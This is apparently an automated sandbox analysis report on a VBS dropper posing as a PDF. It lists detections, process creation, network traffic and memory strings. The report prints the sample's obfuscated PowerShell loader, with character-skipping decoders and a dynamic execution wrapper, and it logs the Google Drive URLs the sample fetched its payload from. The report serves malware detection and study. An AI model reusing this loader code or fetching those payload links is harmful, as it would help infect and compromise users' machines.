PepNCo.rSDolldUnpoeR.sbL BessU.va=Fr sNG dsESkinW Gen- MelOPengBDiviJGrabeTraaC Mu Tgr,v TaarSEtaaYIsolSBallT Da,eSekuMLed .Cel $Datam Be ePr fd AtaD AlpeRingLHi eAVinegTammT MasI SmoG');Opgrelsesdatoer ($Multilobulated);Opgrelsesdatoer (ampler 'T,rs$Vir I KunnSelefUd,to S.erMikrmAfvraMavetFormiFainoK innJydesindedFinaeGob,l oods Slg. BalHHomoeAntiaB,oudEggpe T.arChefsMask[L.ng$Di.hLSlo
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4604, ProcessName: svchost.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T09:13:30.079804+010028033053Unknown Traffic192.168.2.1049683172.217.18.110443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T09:14:21.549898+010028032702Potentially Bad Traffic192.168.2.1049696172.217.18.110443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: DIR-A_JY4878249#U00b7pdf.vbsVirustotal: Detection: 9%Perma Link
              Source: Yara matchFile source: 00000010.00000002.1795056108.00000000083FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.2% probability
              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.10:49682 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.10:49684 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.10:49696 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.10:49697 version: TLS 1.2
              Source: Binary string: System.Management.Automation.pdbR_" source: powershell.exe, 00000004.00000002.1338372516.00000217A1BB0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdb9s source: powershell.exe, 0000000E.00000002.1641329361.00000000070A1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdb+ source: powershell.exe, 00000004.00000002.1340541608.00000217A1E25000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.1338372516.00000217A1C11000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lU6oBrMHWE9Km-jng8EUzPgDN-8Kgh8M HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=1lU6oBrMHWE9Km-jng8EUzPgDN-8Kgh8M&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49696 -> 172.217.18.110:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49683 -> 172.217.18.110:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lU6oBrMHWE9Km-jng8EUzPgDN-8Kgh8M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1d4APER-Gjv3aGK8yeNY5ScAYonlC68yo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1d4APER-Gjv3aGK8yeNY5ScAYonlC68yo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lU6oBrMHWE9Km-jng8EUzPgDN-8Kgh8M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lU6oBrMHWE9Km-jng8EUzPgDN-8Kgh8M HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=1lU6oBrMHWE9Km-jng8EUzPgDN-8Kgh8M&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1d4APER-Gjv3aGK8yeNY5ScAYonlC68yo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1d4APER-Gjv3aGK8yeNY5ScAYonlC68yo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: Host_6637.6637.6637.657e
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 0000000E.00000002.1607532734.0000000002C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro24
              Source: powershell.exe, 0000000E.00000002.1641329361.000000000706A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro34t)
              Source: svchost.exe, 00000007.00000002.2346044968.0000019940000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: wscript.exe, 00000000.00000003.1053446598.0000021023273000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1052913501.0000021023273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/D
              Source: wscript.exe, 00000000.00000003.1069371715.000002102134B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1068877240.000002102133E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1070116325.000002102134B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en-
              Source: wscript.exe, 00000000.00000003.1069371715.000002102134B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1068877240.000002102138E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1068877240.000002102133E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1069371715.000002102138E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1070116325.000002102138E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1070116325.000002102134B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000000.00000003.1053573900.00000210213BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1053404315.0000021021398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?808f42342a998
              Source: wscript.exe, 00000000.00000003.1053857162.0000021023248000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1053648095.0000021023248000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1053534038.0000021023221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?808f42342a
              Source: svchost.exe, 00000007.00000003.1203164021.000001993FDA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: powershell.exe, 00000004.00000002.1323764875.00000217997CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.1288130859.0000021789987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.1288130859.0000021789761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1609887195.0000000004751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.1288130859.0000021789987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.1288130859.0000021789761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
              Source: powershell.exe, 0000000E.00000002.1609887195.0000000004751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBoq
              Source: powershell.exe, 00000004.00000002.1288130859.0000021789BFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789BE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789BFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000004.00000002.1323764875.00000217997CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.1323764875.00000217997CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.1323764875.00000217997CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.g
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.go
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goo
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goog
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googl
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.c
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.co
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?e
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?ex
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?exp
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expor
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=d
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=do
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=dow
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=down
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downl
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downlo
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downloa
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&i
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1l
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6o
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oB
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBr
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrM
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMH
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHW
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9K
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-j
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jn
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng8
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng8E
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng8EU
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng8EUz
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng8EUzP
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng8EUzPg
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng8EUzPgD
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng8EUzPgDN
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng8EUzPgDN-
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng8EUzPgDN-8
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng8EUzPgDN-8K
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng8EUzPgDN-8Kg
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng8EUzPgDN-8Kgh
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng8EUzPgDN-8Kgh8
              Source: powershell.exe, 00000004.00000002.1288130859.000002178AF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng8EUzPgDN-8Kgh8M
              Source: powershell.exe, 00000004.00000002.1288130859.0000021789987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng8EUzPgDN-8Kgh8MP
              Source: powershell.exe, 0000000E.00000002.1609887195.00000000048A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lU6oBrMHWE9Km-jng8EUzPgDN-8Kgh8MXR
              Source: powershell.exe, 00000004.00000002.1288130859.0000021789BFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789D0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lU6oBrMHWE9Km-jng8EUzPgDN-8Kgh8M&export=download
              Source: powershell.exe, 00000004.00000002.1288130859.0000021789BFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.comp
              Source: svchost.exe, 00000007.00000003.1203164021.000001993FE1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
              Source: svchost.exe, 00000007.00000003.1203164021.000001993FDA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
              Source: powershell.exe, 00000004.00000002.1288130859.0000021789987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.1323764875.00000217997CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.1288130859.0000021789BFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789BE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789BFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000004.00000002.1288130859.0000021789BFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789BE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789BFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000004.00000002.1288130859.0000021789BFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789BE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789BFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000004.00000002.1288130859.0000021789BFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789BE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789BFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000004.00000002.1288130859.0000021789BFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789BE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1288130859.0000021789BFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
              Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.10:49682 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.10:49684 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.10:49696 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.10:49697 version: TLS 1.2

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000010.00000002.1795056108.00000000083FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Source: amsi64_6344.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_5904.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6344, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5904, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Chairlift;function Opgrelsesdatoer($Perdricide){ .($Buenas) ($Perdricide)} function ampler($Envoyjcs){$Demineraliserings=4;do{$Yamshik+=$Envoyjcs[$Demineraliserings];$Demineraliserings+=5;$Tenebrosity=Format-List} until(!$Envoyjcs[$Demineraliserings])$Yamshik}$Meddelagtig=ampler 'Ho enSp jeSepaTOoph..nglW';$Meddelagtig+=ampler ' HereBldgBStudCCrocLIsoci ReaEF ignpseuT';$Marginellidae=ampler 'KravM sunoKampzVariiRacil Mullun aaKrad/';$Libretto=ampler 'Rec.TCerilDjersUnst1Dobb2';$trediveaarsfdselsdagene='Ki l[Sortn CeceS roTSamm.AmblS.emoe Klarsuppvtun IUp,lcSu.fE.awtpLoy o icaI K fNSibeTPar mL upa Tacn Pa asigggFaitE porR Esk]Cape:d fe:BlteSExigeAstrcBlafU Mi rNyanIDisitPaadY Sk PBirerCircoTinftSaldot.evcC.asOabyillabe= Udp$UdviLTortiO thbencar SpeEBlewTRu.dTWillO';$Marginellidae+=ampler 'Noni5 ui.Zaza0P da E.v(BuggWKommi Counomlad Endoaf,twAfsksKore GhetN DomTRa e T ks1Told0Upfu.Orch0 Kai;.mpe ,egeWTi.vi Ko,n fut6 Sta4Rube;Ps.u KvarxCald6Kuki4Skin;Posi GlacrDimnvFrmn:Effe1Ti e3Ext 4zinn. Mod0Pind)Fald osGHan ePushcAntikHydro Dor/ Ago2Cali0Tl.e1Terp0sa k0d if1Uafl0 D s1S gu LyssF Se,i Pirr.apie CorfSh noPeelx Ban/be.e1Tann3Seiz4 Sho. Una0';$Lygteples240=ampler 'KursUBarnsLongE BalrL.ng-SunrAGodkgUnsheO 